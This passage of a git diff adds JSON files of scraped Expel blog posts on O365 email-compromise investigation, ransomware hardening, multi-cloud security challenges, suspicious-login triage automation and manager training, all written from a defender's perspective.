bit. Take a look at this example where, with the help of some automation, we\u2019re able to quickly review 30 days of login activity based on IP address and user-agent combinations. Review mailbox activity for the user This is a really good step if your initial lead into possible BEC activity was something like a suspicious login to an account that originated from a VPN service provider. If you already have O365 mailbox auditing enabled , review mailbox activity for the user and be on the lookout for the threat actor techniques we mentioned above. Don\u2019t be afraid to review 30 days worth of mailbox activity. Does the user account in question typically delegate mailbox permissions or create inbox rules to help manage their email? Context matters. Review login activity for the IP address The next step is to review 30 days\u2019 worth of login activity for the IP address in question. Do you see successful authentications into multiple accounts from the IP address? Or do you only see activity into the user account in question? By reviewing login activity from the IP address in question, you\u2019re gaining greater context. This is also a valuable scoping action if the threat actor is accessing multiple accounts from the same IP address. Scope and pivot! Finally, through the investigative process you might establish new leads into BEC activity like a new external IP address used to authenticate into victim mailboxes or an inbox rule configured to silently drop any emails containing the word \u201cdocument.\u201d Make sure to pursue them to properly scope the activity. Let\u2019s say that through scoping you observed a BEC threat actor authenticate into a victim\u2019s mailbox from a popular VPN service provider. With this knowledge in hand, set out to answer how many other accounts the threat actor accessed from the VPN service provider. Here\u2019s another example: if you know the threat actor is creating inbox rules to silently drop messages, figure out if O365 logs recorded similar activity for any other account. And if you find new leads through that? Pursue them! How do I get started? To take advantage of the alerting opportunities based on the different scenarios we described above, here are a couple #protips to get started: Enable mailbox auditing in O365. Microsoft is in the process of enabling mailbox auditing by default across all its business users, but it doesn\u2019t hurt to double check that mailbox auditing within your organization is enabled. You\u2019ll gain visibility into mailbox login activity and actions typically performed in BEC attacks. Not sure how to enable mailbox auditing? Just follow these easy instructions. Integrate O365 with your SIEM. This step allows your team to centralize alerts coming from O365, integrating them into the same workflow you\u2019re already using. Here are step-by-step instructions on integrating O365 with your SIEM. Or we could totally just do all of this for you if you\u2019re looking for an \u201ceasy\u201d button. Have more questions about BEC? You can always drop us a note \u2014 we\u2019d love to chat." +} \ No newline at end of file diff --git a/so-long-2022-our-year-in-review.json b/so-long-2022-our-year-in-review.json new file mode 100644 index 0000000000000000000000000000000000000000..f40649e7659b5d9d67bfb4f83d3a3ce4a4bf246c --- /dev/null +++ b/so-long-2022-our-year-in-review.json @@ -0,0 +1,6 @@ +{ + "title": "So long, 2022! Our year in review", + "url": "https://expel.com/blog/so-long-2022-our-year-in-review/", + "date": "Dec 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG So long, 2022! Our year in review Engineering \u00b7 1 MIN READ \u00b7 ANDY RODGER \u00b7 DEC 30, 2022 \u00b7 TAGS: Careers / Cloud security / Company news / MDR / Tech tools We can hardly believe we\u2019re about to close the books on 2022 and ring in the new year. While we\u2019re hopeful and excited about what 2023 has in store for Expel, we can\u2019t help but reflect on the last 12 months, and warmly reminisce about all we accomplished. So to mark the end of one chapter and welcome the next, we\u2019ve curated some of our favorite blog posts over the last year to share with you, our loyal readers. Enjoy! Findings and predictions from our SOC Expel Quarterly Threat Report Q3: Top 5 takeaways Top 5 takeaways: Expel Quarterly Threat Report Q2 Expel Quarterly Threat Report: Cybersecurity data, trends, and recs from Q1 2022 Great eXpeltations 2022: Cybersecurity trends and predictions Incident reports and emerging threats Emerging Threats: Microsoft Exchange On-Prem Zero-Days Incident report: how a phishing campaign revealed BEC before exploitation Emerging Threat: BEC Payroll Fraud Advisory Incident report: Spotting an attacker in GCP Incident report: From CLI to console, chasing an attacker in AWS Getting to know us The Zen of cybersecurity culture Watch out EMEA\u2026here we come It\u2019s official: we\u2019re a Great Place to Work\u00ae A year in review: An honest look at a developer\u2019s first 12 months at Expel Let\u2019s talk compensation: Why Expel made the move to pay transparency Useful resources Touring the modern SOC: where are the dials and blinking lights? An Expel guide to Cybersecurity Awareness Month 2022 Detection and response in action: an end-to-end coverage story A defender\u2019s MITRE ATT&CK cheat sheet for Google Cloud Platform (GCP) Helpful tools for technical teams to collaborate without meetings Product information, updates, and improvements 45 minutes to one minute: how we shrunk image deployment time Understanding role-based access control in Kubernetes Remediation should be automated\u2014and customized How Expel\u2019s Alert Similarity feature helps our customers Cutting Through the Noise: RIOT Enrichment Drives SOC Clarity To get notifications when we publish new blog posts, go ahead and hit that green \u201cSubscribe\u201d button below. You\u2019ll be glad you did! Happy New Year!" +} \ No newline at end of file diff --git a/so-you-re-a-manager-congrats-now-what.json b/so-you-re-a-manager-congrats-now-what.json new file mode 100644 index 0000000000000000000000000000000000000000..d5fade4202e2d75cf1a17da5e76e9356712e25b6 --- /dev/null +++ b/so-you-re-a-manager-congrats-now-what.json @@ -0,0 +1,6 @@ +{ + "title": "So you're a manager. Congrats! Now what?", + "url": "https://expel.com/blog/youre-a-manager-now-what/", + "date": "Jul 14, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG So you\u2019re a manager. Congrats! Now what? Talent \u00b7 4 MIN READ \u00b7 LAURA KOEHNE \u00b7 JUL 14, 2020 \u00b7 TAGS: Career / Employee retention / Great place to work / How to / Management We\u2019ve all been there. Your boss tells you she thinks you\u2019re ready to manage a few people on the team. Hooray! You\u2019ve been waiting for this day for ages! But when all the congratulatory high-fives subside, there\u2019s just one problem: you have exactly zero tools in your toolbox to help you be a manager. Where do you even start? Management at Expel: our $0.02 This scenario happens far too often. You\u2019re deemed a manager and then thrown into the deep end of the management pool \u2026 with no life jacket. You\u2019re given no tips, tricks or resources to help you figure out how the heck to actually be a good manager. Plenty of us here at Expel experienced this scenario in our past professional lives. In the absence of real guidance from former managers and HR teams, we splashed along trying our best to figure out that whole management thing on our own. This is precisely why we decided to \u201cdo\u201d management differently at Expel, and approach the process of becoming a manager in a much more intentional and thoughtful manner. Here\u2019s the thing: if you do your job as a manager well, not only will you achieve results for the company, someone will hopefully remember you as a person who changed their life in ways they never expected. And you\u2019ll show them how to be a great manager for someone else. Remember that your efforts will have a positive ripple effect on others. If that doesn\u2019t make it worthwhile to be an intentional manager, I don\u2019t know what does. We feel great management is paramount to making the employee\u2019s journey as successful as possible. A managers\u2019 habits \u2013 the thousand little everyday decisions \u2013 are what matter most to employees. This is where culture becomes reality. So what\u2019s our $0.02 on management? Invest in training managers. We believe managers are critical in scaling culture \u2013 not only in the way we grow our business but in the way we keep Expel true to who we are. Three ways we\u2019re \u201cBUILDing\u201d great managers A few months ago, we kicked off a new program at Expel designed to \u201cBUILD\u201d great managers and give them the support they need to become the leaders that others remember fondly. We turned \u201cBUILD\u201d into an acronym, which became the name of this effort: Building Up Intentional Leaders Daily. And that\u2019s exactly what we ask of every manager at Expel, from a first timer to a seasoned execuwonk: be intentional about management. Commit to a habit of learning, practicing and getting better every day. We know people management is hard. Becoming a great manager isn\u2019t something that happens overnight \u2013 it\u2019s a lifelong journey. So we created a program to support each manager on the path, the Expel way. Our manager program is made of three components that provide opportunities for continued conversations and skills building. While becoming a manager at Expel isn\u2019t a linear path, here are experiences you can look forward to: First \u2026 The \u201cMaking of a Manager\u201d book club: A book club?! Yeah, a book club. But not the kind your grandma goes to with her bridge group. To start our 2020 program, we gave our people managers copies of The Making of a Manager by Julie Zhuo. Managers divided into groups to discuss what they took away from the book, reading a few chapters each week. Hearing what other leaders are doing in their teams and being honest with each other about what\u2019s working well (and what\u2019s not) was beneficial, and helped us all build connections across the org as we prepared to level up our management skills. After we finished the book, we were thrilled to have Julie Zhuo join us for a Zoom chat to answer all our questions and talk more about the ins and outs of management. Our whole company was invited because every Expletive needs to know what being a great manager looks like at Expel so that we can all hold our managers accountable and support them in this learning. Every new manager we promote or hire receives a manager box that includes a copy of The Making of a Manager . This book is foundational for our journey. Then \u2026 Monthly Manager Habits: At Expel we identified 12 manager habits that, when done well and consistently, help us become better managers, better coworkers and more aligned with our company values. Each month we collectively explore a single topic \u2013 an essential Expel manager habit \u2013 giving each other ideas on how to apply those habits with our own teams. We work on these skills independently every week, coming together in a two-hour online workshop mid-month to pressure test our learning. Servant leadership is a core tenet at Expel. All of our manager habits are understood through the lens of how they help us better serve others. So, new managers attend our Serve Others workshop as a gateway into the BUILD program. After attending the workshop, a new manager can jump into the next month\u2019s habit. Over the course of a year, they will build their skills and experiences in each of the 12 habits. Coupled with \u2026 Leadership coaching: Books and workshops are a solid start to building our collective management skills, but something we feel is important to our leaders is the opportunity to work directly with a leadership coach for more personalized advice. For a full year while in the BUILD program, each manager has unlimited 1:1 sessions with a BetterUp coach to discuss issues and goals they choose. These are the three core parts of our BUILD program \u2026 for now. It\u2019s important to be adaptable, especially in these uncertain times, and this design is by no means set in stone. We rely on feedback from our managers on what\u2019s useful and what else they\u2019re interested in learning. We believe dialogue is key. So as we move forward, we\u2019ll continue having conversations with our managers to ensure they get what they need to successfully BUILD great management skills. What have you found most helpful in your own management journey? We\u2019d love to hear ." +} \ No newline at end of file diff --git a/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json b/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json new file mode 100644 index 0000000000000000000000000000000000000000..09801b89771110d34ea1ab48d9827326e553217e --- /dev/null +++ b/so-you-ve-got-a-multi-cloud-strategy-here-s-how-to-navigate.json @@ -0,0 +1,6 @@ +{ + "title": "So you've got a multi-cloud strategy; here's how to navigate ...", + "url": "https://expel.com/blog/multi-cloud-strategy-four-security-challenges/", + "date": "Jun 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG So you\u2019ve got a multi-cloud strategy; here\u2019s how to navigate four five common security challenges Tips \u00b7 7 MIN READ \u00b7 ANDREW PRITCHETT, IAN COOPER AND BRANDON DOSSANTOS \u00b7 JAN 12, 2023 \u00b7 TAGS: Cloud security / Managed detection and response / Selecting tech / Tools This blog was originally posted on Jun 25, 2020 and was updated by Ian Cooper and Brandon Dossantos in January 2023 to include a fifth(!) cloud security challenge. I once attended a week-long training seminar on cloud security architecture. The audience included a few security engineers, security architects and a larger group of security administrators and CISOs. Our instructor kicked off the session with a few questions. First up: \u201cHow many of you are actively using a cloud platform at work?\u201d All but maybe two or three attendees raised their hands. He then asked how many were using Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP), respectively, and then polled the room for any other cloud platforms used. After each question, attendees quickly raised their hand in response. Then came: \u201cHow many of you are actively using two or more cloud platforms at work?\u201d Some of the cloud engineers\u2019 hands went up immediately, a few of the security architects slowly and apprehensively put their hands up, and I could tell that many of the security administrators were simply struggling to decide whether they should have a hand up or not. \u201cAh, don\u2019t worry about it,\u201d the instructor joked. \u201cIf your hand is not up yet, it will be the next time you\u2019re asked!\u201d Those with their hands in the air laughed knowingly. And the rest of the room dropped their foreheads toward the desks in front of them. So what\u2019s going on? How is it that some security administrators and CISOs don\u2019t know that they have data in several clouds? That\u2019s a whole other story. For most of us, going multi-cloud is inevitable. So let\u2019s talk about potential security challenges and how we\u2019ve helped our customers navigate them so far. Challenge #1: Skills and knowledge gap deficiencies Let\u2019s be honest: The technology market has a huge unmet demand for skills. This gap only increases when you require proficiency in cloud computing. You\u2019ll have an easier time finding a real, live unicorn than an unemployed person with proficiency in multiple cloud platforms. I try to keep some proficiency across multiple cloud environments but, admittedly, it\u2019s really tough. Especially, because cloud platforms are constantly changing and evolving. Trying to be proficient across multiple platforms is like a game of trying to hit fast moving targets. So what does this mean for your organization? Sometimes you\u2019ll have to make do with the resources you have. Try your best to provide folks with additional training where you can and be patient with your teams as they continually learn and grow in an evolving space. This also means that mistakes may happen. Requiring peer review on change requests is an excellent approach to reduce the likelihood of mistakes happening; however, this assumes that the individual doing the peer review can also identify the mistake. We often see policy changes that present risk to our customers \u2013 for example, granting the wrong roles for a storage bucket which exposes the content publicly. We\u2019ve witnessed this in AWS environments, and wrote a post all about keeping an eye out for open Amazon S3 buckets (and how to fix \u2018em) right here . The policy change is rarely directed from malice, but simply from the fact that the individual performing the action didn\u2019t understand the potential ramifications of their policy change. Challenge #2: Auditing differences across cloud providers Every CSP has a different schema for their audit logs. To a multi-cloud practitioner, combing through them can feel like reading a different language as you move from cloud environment to cloud environment. Not to mention that we haven\u2019t observed an audit to be \u201capples to apples\u201d across cloud platforms. We also found that auditing coverage is closely tied to the maturity of the service provided. As these products mature and more use cases are requested, I suspect we\u2019ll see improvement here. Audit logs are generally separated into groupings \u2013 administrative activity is generally grouped into one log source while data access and system event activities are separated, respectively. AWS has CloudTrail and CloudWatch while GCP has Admin Activity Logs and Data Access Logs. What specifically divides the activities separated into these different log streams differs slightly by definition from each cloud provider. Also, what logs need to be enabled and configured by the consumer versus what needs to be enabled and configured by the cloud provider varies. Challenge #3: Loss of centralized management of users and role-based access control Say you started with one cloud platform and finally organized all of your users and groups, and got around to defining your policies for least privilege. You were just about to pat yourself on the back when your VP of Engineering tells you, \u201cHere\u2019s the link to our new cloud platform.\u201d The second cloud platform has a slightly different business use case, slightly different business requirements and user base. Now you have to manage identity and access management (IAM) in AWS and IAM in GCP. The services are similar but all of the role names are different and extend slightly different levels of privilege. You have Amazon resource numbers (ARN) in AWS and member IDs in GCP as well as IAM inheritance in GCP and IAM with security groups in AWS. So you can\u2019t simply copy over your GCP IAM policy configuration to AWS. Role-based access control (RBAC) can become difficult. You must now remember when you add, modify, or remove privilege for a user in one environment to also reflect that change in your other environment. Not to mention that while you\u2019re trying to figure this out, you have engineers going around with company credit cards adding new services and standing up new infrastructure in both environments. Challenge #4: Data overload on security teams CloudTrail Logs, Data Access Logs and virtual private connection (VPC) flow logs; oh my! Literally trillions of logs are now being generated across your multiple cloud environments! In an average three-day period of time, Expel generates about 88 million log events in our GCP environment, not including VPC or System Event Logs. The big question we hear from prospects is, \u201cI get a ton of cloud audit logs, way more than we\u2019d ever have time to review. What do I actually need to care about?\u201d The other question is, \u201cWhat do I do with all of these logs?\u201d Ultimately, after all of the work and cost involved in getting all of your logs into a centralized location or SIEM, your team is still drowning in audit logs with multiple schemas and wondering: what actually matters? We even published a post about generating strong security leads from Amazon CloudTrail through a SIEM. Challenge #5: Building a detection strategy based on security incident reports from the wild It can be challenging to find security incident reports in the wild, especially with Azure and GCP. Discussion on security in the cloud vs security of the cloud come to mind when reflecting on famous cases like the CapitalOne breach. To build a strong detection strategy, we need to review past incidents involving security in the cloud (AKA, things that you can actually control). Protecting partners with a variety of cloud infrastructure has given our team a lot of experience in such incidents: AWS \u2013 For AWS incidents, we have a variety to choose from. The most popular cloud hosting platform naturally sees the most action. Read about how our SOC investigated privilege escalation from an attacker armed with long term access keys here . Azure \u2013 Across all cloud platforms, we see a lot of attempts to deploy generic coin miners. Sometimes the initial lead can appear quite spooky, with analysts ready to respond to hands-on keyboard attackers only to discover that a scanner for vulnerable resources has dropped a generic coinminer. Sometimes, our team actually gets more value out of a simulated attack in the cloud. One red team landed on an Azure VM, and then moved laterally via PostGresql. Communicating with the customer after confirming it was a test- our analysts continued to investigate and observed the red team\u2019s efforts in real time. GCP \u2013 Not many in-house security teams will have a history of security incidents in GCP to review and use to improve defenses. In one interesting GCP incident, the attacker grabbed a GCP service account key that was committed to a public github repo. Upon acquiring exposed credentials, the attacker attempted to create a new service account key and enable it to maintain persistent access to the customer\u2019s GCP environment. The attacker attempted to escalate privileges and move laterally using various features with the gcloud cli and SDK. With multiple alarm bells ringing, the SOC jumped in to help the customer remediate and become more resilient to similar attacks in the future. Incidents like these are a gold mine for our team to review attacker behaviors and continue to build upon our detection strategies in the cloud. With a growing arsenal of in-house cloud detections, Detection & Response engineering at Expel greatly values the incident retro process \u2013 we work hard to absorb the lessons learned when incidents happen, and analyze every step of the attacker\u2019s process to hunt for detection gaps. How your third-party security partner should help If you run in multiple CSPs and work with a third-party managed security partner, there are three key ways that provider should be supporting you: Reduce complexity and hopefully costs as well; Provide centralized security management for your decentralized clouds; and Provide you with alerts and answers about what\u2019s happening in your environments. It\u2019s reasonable to assume that, even if you do have an in-house SOC, not everyone will have expertise in every CSP. Third-party security partners can help you bridge knowledge gaps. It takes a team that continuously applies their learnings to better understand what normal should look like in each security environment. They also need to understand what types of actions can increase risk to your organization and provide you with recommendations to make your organization more resilient in the cloud. But understanding these nuances doesn\u2019t happen overnight. This is an area for where a third-party security partner can jump in to boost your expertise. So how do we help our customers here at Expel? We\u2019re lucky to have analysts working around the clock who are experienced in investigating security incidents in the cloud. Each investigation helps them gain a depth of knowledge in specific cloud platforms as well as our customers\u2019 unique environments. As a result, our analysts know where to look and what to look for. They not only pull out the important events from the mountain of cloud security signals but also provide meaningful answers to alerts. Additionally, our detection and response engineers are constantly researching new attack theories, policy changes which present risk to our customers\u2019 organizations and newly added cloud platform services to always keep cloud alerts up to date and relevant. We monitor cloud security signals and provide customers with a centralized location for all cloud security alerting and investigation. This is the part where you can finally exhale. We get it \u2013 this is overwhelming. But don\u2019t worry. Remember that there are solutions to this tricky security challenge. Want to talk to a human about how we can help you out? Contact us ." +} \ No newline at end of file diff --git a/someone-in-your-industry-got-hit-with-ransomware-what.json b/someone-in-your-industry-got-hit-with-ransomware-what.json new file mode 100644 index 0000000000000000000000000000000000000000..9bd5fbb1c6a7116ca8c14c8af0f11d2db27e3688 --- /dev/null +++ b/someone-in-your-industry-got-hit-with-ransomware-what.json @@ -0,0 +1,6 @@ +{ + "title": "Someone in your industry got hit with ransomware. What ...", + "url": "https://expel.com/blog/someone-in-your-industry-got-hit-with-ransomware-what-now/", + "date": "Jun 3, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Someone in your industry got hit with ransomware. What now? Security operations \u00b7 4 MIN READ \u00b7 TYLER FORNES \u00b7 JUN 3, 2021 \u00b7 TAGS: MDR / Tech tools The hits (and headlines) just keep coming. It seems like every week there\u2019s a new story about an organization that\u2019s become the latest victim of a ransomware attack. When ransomware strikes someone else in your industry, you can\u2019t help but think, \u201cThis could\u2019ve just as easily happened to us.\u201d Looking across our customer base, 12 percent of the incidents we detected by the Expel Security Operations Center (SOC) in April 2021 had the potential to become a ransomware event. These incidents didn\u2019t result in a ransomware event because we stopped them early in the attack lifecycle. The prospect of a ransomware attack is scary. But the good news is that there are plenty of precautions you can take to make your org as secure as possible and resilient against ransomware. Targeted versus opportunistic ransomware: What\u2019s the difference? Whether a sophisticated targeted attack, or a tried and true tactic that dupes users, you should be on the lookout for these two types of ransomware attacks: Opportunistic attacks Unlike targeted attacks, which spend time lurking in an environment for weaknesses, opportunistic attacks prey on orgs that are most likely to not have a strong security posture. These attacks are used to make a quick buck and use cheap tactics like phishing or scanning for and exploiting common public facing vulnerabilities. The difference? A much shorter time to ransom. Once their random attack succeeds, the infection begins and typically spreads very quickly. Similar to targeted attacks, once infected, orgs are forced to exchange money to retrieve their data We\u2019ve also seen an increase in opportunistic attacks in recent years and our SOC responded to several opportunistic incidents where an actor scanned the internet for remote access services \u2013 like Remote Desktop Protocol (RDP) \u2013 that are exposed to the internet. Once identified, the attacker will brute force a weak credential that allows authentication into the server. Then a ransomware payload is uploaded and executed on the machine. This type of attack is often automated and requires no human input to continue to infect thousands of vulnerable machines across the internet. Since this is a \u201cspray and pray\u201d approach, the goal here is to infect a large number of machines in hopes that a handful of them will end up paying a ransom, instead of targeting and identifying high-value targets. Targeted attacks Crafty attackers looking for a big payoff are starting to get more strategic, and are willing to play the long game to get ahold of important data that orgs can\u2019t afford to lose. This means that they\u2019re investing their time in targeting specific orgs (like the healthcare and financial industries) that have the potential to store sensitive data that can draw a large ransom. Targeted ransomware attacks usually also have a longer time to ransom, where the attacker may have broken in months earlier and implanted themselves into the network using a backdoor. Using this access, they may choose to perform reconnaissance and move laterally to a sensitive server before deploying the ransomware. This guarantees the data that will pay the highest ransom is in control of the attackers. We\u2019re noticing an increase in targeted attacks \u2013 and an increase in the amount of money they\u2019re demanding. In fact, Palo Alto\u2019s recent 2021 ransomware threat report shows that the amount of money attackers demanded in 2020 DOUBLED from the previous year. Bad actors taking advantage of a terrible and chaotic moment in time? Disappointed but not surprised. From our front lines, we recently saw a targeted campaign against the financial sector that deployed the GOOTKIT loader via a zipped JavaScript file. Once this payload was delivered, we observed the loader deploy a Cobalt Strike BEACON payload which eventually led to the attempted installation of REVIL ransomware. This narrative is becoming the standard for ransomware operations and allows for not only the installation of ransomware, but domain reconnaissance, credential theft and any other capability you would expect from a sophisticated actor. Six things to do right now to guard against a ransomware attack There are specific actions you can take in your environment today to better protect your org against a ransomware attack: Create and test backups regularly: Consider creating and testing backups of data within your org as part of your IT policy. Regularly creating valid backups that aren\u2019t accessible from your production environment will minimize business disruptions while recovering from ransomware attacks or data loss. The most important part? Test them. As a wise Tweet once said: Test your incident response plan: A real-life security incident isn\u2019t the best time to test your incident response (IR) plan. Give yours the stress test regularly \u2013 we recommend once a quarter \u2013 to make sure you and your team know what to do when a bad thing happens. Dare I say you can even make IR testing fun. We made it far more interesting by turning it into a game. You can read all about Oh Noes!, our IR tabletop game, and download your own starter kit right here. Disable RDP on Internet-facing systems: Don\u2019t expose RDP services directly to the internet. Instead, consider putting RDP servers or hosts behind a VPN that\u2019s backed by two-factor authentication (2FA). Want to know if you have RDP exposed in your organization? Here\u2019s a Shodan query that can help: port:3389 net:1.2.3.4/24 (where 1.2.3.4 is your public IP space in CIDR notation). If RDP is running on a non-standard port in your organization, adjust port:3389 to the non-standard port number. MFA everyone: Multi-factor authentication (MFA) isn\u2019t your silver bullet for stopping a ransomware attack, but it\u2019s still an important part of your security strategy. Add another layer of defense to your org and implement MFA (like Duo or Okta) for everyone. Configure WSH files to open in Notepad: Prevent the double-clicking of evil JavaScript files and configure JScript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad, you\u2019ll mitigate common remote code execution techniques. Pro tip: PowerShell files (.ps1) already open by default in Notepad. Want to test how these files currently open in your environment? These steps work great! Block Microsoft Office Macros: Prevent a user from accidentally running a malicious Office macro. Macros are one of the most common ways an attacker attempts to \u201ctrick\u201d a user into running malicious code that can be used to install malware. This is most commonly seen in phishing attacks, where an attacker will send a seemingly legitimate Microsoft Office document for the user to open. This creates an easy vessel for ransomware delivery if macros are allowed across an enterprise. Not sure what your macro policies currently are set to? Check out the Trust Center Settings in Microsoft Office and adjust appropriately for your organization. We recommend: Better: Disable all Office macros except those that are digitally signed. Best: Disable all Office macros." +} \ No newline at end of file diff --git a/spotting-suspicious-logins-at-scale-alert-pathways-to.json b/spotting-suspicious-logins-at-scale-alert-pathways-to.json new file mode 100644 index 0000000000000000000000000000000000000000..e7dbdbdbad5976142f89eea69f3e57ddc3aefd0a --- /dev/null +++ b/spotting-suspicious-logins-at-scale-alert-pathways-to.json @@ -0,0 +1,6 @@ +{ + "title": "Spotting suspicious logins at scale: (Alert) pathways to ...", + "url": "https://expel.com/blog/spotting-suspicious-logins-at-scale/", + "date": "Jun 2, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Spotting suspicious logins at scale: (Alert) pathways to success Security operations \u00b7 8 MIN READ \u00b7 JON HENCINSKI AND PETER SILBERMAN \u00b7 JUN 2, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability Spoiler alert: We improved the median time it takes to investigate and report suspicious login activity by 75 percent between October 2019 and March 2020. We did it by reviewing the investigative patterns of our SOC analysts and deploying a ton of automation to enable our team to answer the right questions quickly. You\u2019ll see in the chart below that we\u2019ve managed to reduce the time it takes to investigate a suspicious login to a matter of minutes over that six-month period. We\u2019re showing the median and 75th percentile here. TL;DR: Line goes up, more time spent. Line goes down? Efficiency FTW! Time to investigate a suspicious login alert Wondering how we turn repetitive tasks into SOC efficiency? We\u2019ll walk you through our view of SOC operations and the key metrics we use to understand where we\u2019re spending too much analyst time on things we should hand off to our robots. But first we\u2019ll take you through how we deployed decision support to reduce the challenge of triaging suspicious login alerts (these can be such a pain if not done correctly, amiright ?). What\u2019s decision support? First things first: Decision support is how we use tech to enable our SOC analysts to answer the right questions about a security event in an easy way. In doing so, we reduce cognitive loading and hand off the highly repetitive tasks to automation (AKA our robots). It\u2019s also a key component on how we make sure our analysts aren\u2019t over subscribed. Pro tip: If you ever go on a SOC tour and the first thing you notice is a lot of sticky notes (hopefully not with passwords on them), that\u2019s the opposite of decision support. At Expel decision support is made up of four key components: Automation Contextual enrichment (especially important in the era of cloud automation) Investigation orchestration User interface attributes How do you build decision support? The bottom line is this: Start by understanding where the team needs the most help, now. What we mean by that is figure out the class of alerts that take the team the longest time to investigate. Do you see any patterns? Is the team asking the right questions? You may need to deploy metrics first. Expel believes that effective investigations are rooted in the quality of questions asked, so we look for where our analysts are asking the same great questions over and over again. For example, analysts may find themselves continuously asking questions like: Where has this user previously logged in from? At what times does the user normally log in? And guess what machines are good at? Yup \u2013 doing the same thing over and over without a break. It really helps to have good SOC metrics and instrumentation in place before you start down this path. Be strategic by defining where you want to get to and measuring it. Look at metrics and build a cadence around it. Keep in mind that finding great SOC metrics doesn\u2019t have to be a complicated endeavor. You just need a group of people sitting down and understanding what\u2019s happening. If you do this, you\u2019ll be in the best position to answer which class of investigation takes the team the longest, and what steps you can automate to make life easier for the team. That said, resist the urge (and encouragement by some) to automate all the things before you have metrics and understand what it\u2019s like to do those activities manually. To help you calibrate, below is a high-level diagram of our own alert management process. Expel SOC system diagram And here are some Cliff\u2019s notes on how to interpret the diagram above: There are six paths. Each path contains a percentage of the capacity utilization for the month recorded. Robots: You\u2019ve heard us mention our robots in previous posts . We ingest security signals from a wide variety of tech and process those events through our detection engine (you\u2019ll notice in the diagram above that we\u2019ve named this robot Josie). Triage: Security events that match a specific criterias generate an alert that is sent to a SOC analyst for human judgement. You see in that diagram that 50 percent of the capacity we utilized was spent here for the month recorded. An alert can take one of three paths: Close: The alert is a false positive. Nothing to see here. I can also mark when \u201cTuning\u201d is required on an alert. Incident: The alert is a true positive. Move to incident and respond. Investigate: After looking at the alert, I\u2019m not sure. I need additional data before I make a call. An Investigation can take one of two paths: Close: After additional investigating, the alert was in fact a false positive. Notify: After additional investigating, the activity in question is suspicious enough where we\u2019d want to tell a customer about it. We then have a set of metrics for each phase. Some of the metrics are the usual suspects, like the time between when an alert is fired and when an analyst picks it up. But when we\u2019re looking for decision support opportunities there are two metrics that we zoom in on: What\u2019s the percentage of alerts, based on the alert type, that move to the investigate bucket? Recall our SOC diagram above. We\u2019re examining the pathway of alerts. Do we move \u201cSuspicious Login\u201d alerts to the investigation bucket 50 percent of the time? This suggests that there\u2019s not enough information in the alert to make a call. We then ask: What information is needed? Can we use the data available from various vendors to bring that decorate the alert so that it can be handled in the \u201ctriage\u201d bucket? Or can we use orchestration to go and fetch that one piece of evidence we need to make a call? We optimize triage for speed, efficiency and accuracy because that\u2019s where we spend most of our time. It\u2019s also a key way we reduce cognitive loading on our SOC analysts. When we move a class of alert to the investigation bucket, how long does it take for the SOC to complete it? We\u2019re talking about investigation cycle time. If it\u2019s taking us more than an hour to complete the investigation into a class of activity, what steps can we automate to improve these times? We\u2019ll go and review the investigations to see what steps our analysts are taking. Once we spot a pattern, that\u2019s the right one, we\u2019ll hand the work off to our robots to do it for us. Note that we never put a timer on our analysts. If it takes us more than an one hour to investigate a class of activity, we use data to spot it and then lead with tech to improve our cycle times. Finally, we review the metrics weekly to monitor progress and spot areas where we need additional tech to improve. Case Study: Suspicious Logins Time to put all of this into practice. Remember to keep our two key metrics in mind \u2013 high likelihood to move to \u201cinvestigate\u201d and time spent on investigation. We spotted suspicious logins to applications/consoles in the cloud (things like O365 and AWS console authentications). As any security analyst knows, this is a class of alert that\u2019s particularly painful. What makes up a suspicious login? To keep things simple it\u2019s a class of alerts where an authentication is flagged based on context we have from the customer (for example customers tell us where they have employees). We also take into account things like whether it\u2019s from a known suspicious region, or if it\u2019s perhaps being accessed through a VPN. It\u2019s important to note that because our analysts are reviewing the alerts, our willingness to open the aperture of what makes a login suspicious is higher than if we were simply tossing alerts over the fence for our customers to review (which is the opposite of what Expel does). Here\u2019s an example where O365 recorded a failed login from a foreign country due to a conditional access policy: Expel alert for suspicious login pre-optimization Just like any other alert, this is a collection of observations that something may be amiss. Does this tell us anything special? Nope. Let\u2019s see if we can answer some of the right questions based on the class of activity using only the evidence within the alert: Key question Able to answer just based on the alert? 1. Where has this user previously logged in from? [font_awesome icon=times] 2. What other accounts has this IP logged into? Were they successful? [font_awesome icon=times] 3. Is this user based out of Aruba? Did they forget to authenticate to the corporate VPN before logging into O365? [font_awesome icon=times] Can we answer key questions by looking at the alert? We sure can\u2019t. And so unsurprisingly, a high percentage of alerts related to suspicious login activity were making their way to our investigation bucket. Further, when we examined our alert pathway metrics for suspicious login alerts they told us that about half the time our analysts would spend a ton of time querying SIEM logs and performing other steps to answer key questions. Below are the alert pathways of interest for Suspicious Logins alerts from May 2019: Alert pathway % of alerts following pathway (pre automation) Alert-to-close 61% Pursue as investigations 39% As a next step we examined suspicious login investigations for patterns. We wanted to answer this question: When we move a suspicious login alert to an investigation, what steps are we taking? You can imagine that we were spending a ton of time querying logs in a SIEM to answer the same questions over and over again. We noticed we were spending a ton of time answering the following: Where did the user log in from last? What\u2019s the IP usage type for the source IP address? At what times does the user normally log in? Where has this user previously logged in from? What user-agent was previously observed for this user? What other accounts has this IP logged into? Were they successful? What\u2019s the users role? Are they a member of any groups that could indicate they travel? Do they typically use a VPN? If so, which ones have we seen? So, the conclusion we arrived at was that if these are the questions we need to answer to make sure we\u2019re making the right decision, we\u2019ll bring this info to the alert automatically . As soon as the alert is generated, our robots (investigation orchestration) will pick it up, grab the data and present it as decision support. Our SOC analysts focus their efforts on making judgement calls and less time grepping through a SIEM. Now when a suspicious login alert fires instead of only presenting the evidence from the alert we use automation to add lots of decision support: Expel alert for suspicious login post-optimization What work do we automate? When a suspicious login alert fires, our robots go and grab: A user authentication histogram that shows at what times a user is normally observed logging in over the past 30 days. A user login activity map that shows the geolocation of previous successful logins, unsuccessful logins and the current login for the user in a weighted bubble map over the past 30 days. A summary of authentication attempts (success and failure) from the source IP address recorded in the alert. A login frequency summary for the user based on 